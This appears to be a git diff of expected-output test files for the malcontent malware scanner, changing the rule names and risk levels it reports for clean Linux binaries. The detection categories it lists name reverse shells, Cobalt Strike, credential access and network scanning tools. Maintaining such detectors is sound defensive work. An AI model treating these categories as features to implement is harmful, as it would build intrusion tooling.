[Invalid heartbeat info:](https://github.com/search?q=Invalid+heartbeat+info%3A&type=code)
[No Heartbeat Info pa](https://github.com/search?q=No+Heartbeat+Info+pa&type=code)
[heartbeat:](https://github.com/search?q=heartbeat%3A&type=code)
[heartbeat_handler](https://github.com/search?q=heartbeat_handler&type=code) | | MEDIUM | [lateral/scan/target_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/target_ip.yara#target_ip) | References a target IP | [target IP](https://github.com/search?q=target+IP&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code)
[application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | | MEDIUM | [net/http/content_length_0](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | @@ -82,8 +84,6 @@ | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | -| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | -| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!!](https://github.com/search?q=0+++++++%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!!](https://github.com/search?q=12366++++++%21%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[AGG !!](https://github.com/search?q=AGG+++++%21%21&type=code)
[CGIJMOQS !!](https://github.com/search?q=CGIJMOQS++++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[EE !!](https://github.com/search?q=EE++++%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptorConfig](https://github.com/search?q=interceptorConfig&type=code)
[interceptorEv](https://github.com/search?q=interceptorEv&type=code)
[interceptor_config](https://github.com/search?q=interceptor_config&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | @@ -104,6 +104,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | @@ -172,6 +173,5 @@ | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple index a3083b132..aa2a81b85 100644 --- a/tests/linux/clean/containerd.simple +++ b/tests/linux/clean/containerd.simple @@ -73,7 +73,6 @@ fs/watch: low hw/dev/block_ice: medium hw/dev/mapper: medium impact/remote_access/heartbeat: medium -lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md index cd340dd51..353ca110a 100644 --- a/tests/linux/clean/cpack.md +++ b/tests/linux/clean/cpack.md @@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code) | | MEDIUM | [crypto/file_encrypter](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/file-encrypter.yara#file_crypter) | Encrypts files | [cryptor](https://github.com/search?q=cryptor&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | @@ -30,7 +30,7 @@ | MEDIUM | [fs/proc/meminfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/meminfo.yara#proc_meminfo_val) | get memory info | [/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code) | | MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | | MEDIUM | [impact/remote_access/crypto_listen_socks](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/crypto_listen_socks.yara#socks_crypto_listener) | socks crypto listener | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [CPACK_DOWNLOAD_ALL](https://github.com/search?q=CPACK_DOWNLOAD_ALL&type=code)
[CPACK_DOWNLOAD_SITE](https://github.com/search?q=CPACK_DOWNLOAD_SITE&type=code)
[CPACK_IFW_DOWNLOAD_ALL](https://github.com/search?q=CPACK_IFW_DOWNLOAD_ALL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL&type=code)
[CPACK_USES_DOWNLOAD](https://github.com/search?q=CPACK_USES_DOWNLOAD&type=code)
[Call DownloadFile](https://github.com/search?q=Call+DownloadFile&type=code)
[DOWNLOAD HASH mismatch](https://github.com/search?q=DOWNLOAD+HASH+mismatch&type=code)
[DOWNLOAD cannot set TLS](https://github.com/search?q=DOWNLOAD+cannot+set+TLS&type=code)
[DOWNLOAD cannot set http](https://github.com/search?q=DOWNLOAD+cannot+set+http&type=code)
[DOWNLOAD cannot set url](https://github.com/search?q=DOWNLOAD+cannot+set+url&type=code)
[DOWNLOAD cannot set user](https://github.com/search?q=DOWNLOAD+cannot+set+user&type=code)
[DOWNLOAD error](https://github.com/search?q=DOWNLOAD+error&type=code)
[DOWNLOAD missing ALGO](https://github.com/search?q=DOWNLOAD+missing+ALGO&type=code)
[DOWNLOAD missing VAR for](https://github.com/search?q=DOWNLOAD+missing+VAR+for&type=code)
[Maxdownload](https://github.com/search?q=Maxdownload&type=code)
[VERIFY_DOWNLOADS](https://github.com/search?q=VERIFY_DOWNLOADS&type=code)
[_DOWNLOADED](https://github.com/search?q=_DOWNLOADED&type=code)
[completely downloaded](https://github.com/search?q=completely+downloaded&type=code)
[compute hash on downloaded file](https://github.com/search?q=compute+hash+on+downloaded+file&type=code)
[cw_download_write](https://github.com/search?q=cw_download_write&type=code)
[download_write body](https://github.com/search?q=download_write+body&type=code)
[download_write header](https://github.com/search?q=download_write+header&type=code)
[for the URL download method](https://github.com/search?q=for+the+URL+download+method&type=code)
[hash on failed download](https://github.com/search?q=hash+on+failed+download&type=code)
[is already downloaded](https://github.com/search?q=is+already+downloaded&type=code)
[isDownloaded](https://github.com/search?q=isDownloaded&type=code)
[maxdownload](https://github.com/search?q=maxdownload&type=code)
[partial download completed](https://github.com/search?q=partial+download+completed&type=code)
[protected CPackDownloadArchives](https://github.com/search?q=protected+CPackDownloadArchives&type=code)
[protected CPackDownloadComponents](https://github.com/search?q=protected+CPackDownloadComponents&type=code)
[protected CPackDownloadCount](https://github.com/search?q=protected+CPackDownloadCount&type=code)
[protected CPackDownloadHashes](https://github.com/search?q=protected+CPackDownloadHashes&type=code)
[protected CPackDownloadUrls](https://github.com/search?q=protected+CPackDownloadUrls&type=code)
[skipping download as file already](https://github.com/search?q=skipping+download+as+file+already&type=code)
[t resume download](https://github.com/search?q=t+resume+download&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl to download a file | [curl due to a build-time decision.](https://github.com/search?q=curl+due+to+a+build-time+decision.&type=code)
[curl function was given a bad argument](https://github.com/search?q=curl+function+was+given+a+bad+argument&type=code)
[curl is built without the HTTPS-proxy support.](https://github.com/search?q=curl+is+built+without+the+HTTPS-proxy+support.&type=code)
[curl lacks IDN support](https://github.com/search?q=curl+lacks+IDN+support&type=code)
[curl offers](https://github.com/search?q=curl+offers&type=code)
[curl understands](https://github.com/search?q=curl+understands&type=code)
[curl user interface](https://github.com/search?q=curl+user+interface&type=code) | diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple index c87b72cff..0b0bb693b 100644 --- a/tests/linux/clean/default_config.json.simple +++ b/tests/linux/clean/default_config.json.simple @@ -53,7 +53,6 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium -lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple index e2a82f889..59d257440 100644 --- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple +++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple @@ -52,6 +52,8 @@ data/encoding/json_decode: low data/encoding/json_encode: low data/hash/md5: low discover/network/mac_address: medium +discover/process/name_get: medium +discover/process/parent_pid_get: low evasion/file/prefix: medium evasion/rootkit/refs: medium exec/cmd: medium @@ -77,7 +79,6 @@ impact/remote_access/reverse_shell: high impact/remote_access/trojan: medium impact/rootkit: low lateral/scan/brute_force: low -lateral/scan/tool: high net/dns/txt: low net/download: medium net/http/post: medium @@ -92,8 +93,6 @@ net/url/request: medium os/kernel/seccomp: low persist/daemon: medium process/chroot: low -process/name_get: medium -process/parent_pid_get: low sec-tool/net/masscan: high sec-tool/net/nmap: medium sec-tool/pentest/metasploit_ref: medium diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple index a06ab3b47..e81ca191a 100644 --- a/tests/linux/clean/kuma-cp.simple +++ b/tests/linux/clean/kuma-cp.simple @@ -81,7 +81,6 @@ fs/watch: low hw/dev/block_ice: medium impact/remote_access/heartbeat: medium impact/remote_access/iptables: medium -lateral/scan/tool: medium net/dns: low net/dns/reverse: medium net/dns/servers: low diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple index f9e612813..935e4f3f4 100644 --- a/tests/linux/clean/ld-2.27.so.simple +++ b/tests/linux/clean/ld-2.27.so.simple @@ -1,6 +1,7 @@ # linux/clean/ld-2.27.so: medium anti-behavior/LD_DEBUG: medium anti-behavior/LD_PROFILE: medium +discover/process/runtime_deps: medium evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/hijack_execution/etc_ld.so.preload: medium fs/path/etc: low @@ -12,5 +13,4 @@ fs/tempdir: low impact/exploit/GCONV_PATH: low net/url/embedded: low persist/shell/bash: medium -process/thread_local_storage: medium sus/exclamation: medium diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple index 33fc594bd..6d80a5ff9 100644 --- a/tests/linux/clean/libgcj.so.17.0.0.simple +++ b/tests/linux/clean/libgcj.so.17.0.0.simple @@ -1,4 +1,4 @@ -# linux/clean/libgcj.so.17.0.0: high +# linux/clean/libgcj.so.17.0.0: medium 3P/JPCERT/cobaltstrike_v3v4: medium c2/addr/ip: medium credential/password: low @@ -18,6 +18,7 @@ data/hash/sha1: low data/hash/sha256: low data/hash/whirlpool: medium discover/network/interface_list: medium +discover/process/name_get: medium discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: low @@ -50,7 +51,7 @@ fs/path/var: low fs/permission/modify: medium fs/proc/arbitrary_pid: medium fs/proc/mounts: medium -fs/proc/pid_exe: high +fs/proc/pid_exe: medium fs/proc/stat: medium fs/tempdir: low fs/tempdir/TEMP: low @@ -82,7 +83,6 @@ net/url/embedded: low net/url/encode: medium net/url/parse: low process/multithreaded: low -process/name_get: medium sus/exclamation: medium sus/intercept: medium sus/leetspeak: medium diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple index 475b6f7dd..62cf9ab5c 100644 --- a/tests/linux/clean/libgcj.so.17.simple +++ b/tests/linux/clean/libgcj.so.17.simple @@ -1,4 +1,4 @@ -# linux/clean/libgcj.so.17: high +# linux/clean/libgcj.so.17: medium 3P/JPCERT/cobaltstrike_v3v4: medium c2/addr/ip: medium credential/password: low @@ -18,6 +18,7 @@ data/hash/sha1: low data/hash/sha256: low data/hash/whirlpool: medium discover/network/interface_list: medium +discover/process/name_get: medium discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: low @@ -50,7 +51,7 @@ fs/path/var: low fs/permission/modify: medium fs/proc/arbitrary_pid: medium fs/proc/mounts: medium -fs/proc/pid_exe: high +fs/proc/pid_exe: medium fs/proc/stat: medium fs/tempdir: low fs/tempdir/TEMP: low @@ -82,7 +83,6 @@ net/url/embedded: low net/url/encode: medium net/url/parse: low process/multithreaded: low -process/name_get: medium sus/exclamation: medium sus/intercept: medium sus/leetspeak: medium diff --git a/tests/linux/clean/libsystemd.so.0.simple b/tests/linux/clean/libsystemd.so.0.simple index 904a7a5e4..936565b97 100644 --- a/tests/linux/clean/libsystemd.so.0.simple +++ b/tests/linux/clean/libsystemd.so.0.simple @@ -1,6 +1,8 @@ # linux/clean/libsystemd.so.0: medium data/compression/lzma: low data/random/insecure: low +discover/process/parent_pid_get: low +discover/process/runtime_deps: medium discover/user/USER: low evasion/file/location/var_run: medium exec/program: medium @@ -20,7 +22,6 @@ fs/proc/self_cmdline: medium fs/proc/self_exe: medium fs/proc/self_status: medium fs/watch: low -lateral/scan/tool: medium mem/anonymous_file: medium net/ip/addr: medium net/resolve/hostport_parse: low @@ -37,6 +38,4 @@ process/groups_set: low process/multithreaded: low process/name_set: medium process/namespace_set: low -process/parent_pid_get: low -process/thread_local_storage: medium process/userid_set: low diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index 0581d57d9..fe3d4731f 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -2,7 +2,6 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index 61a1256c2..ede252252 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md @@ -1,11 +1,11 @@ -## linux/clean/lslogins [🛑 HIGH] +## linux/clean/lslogins [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) | | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [evasion/logging/failed_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/failed_logins.yara#failed_logins) | accesses failed logins | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code) | +| MEDIUM | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) | | MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
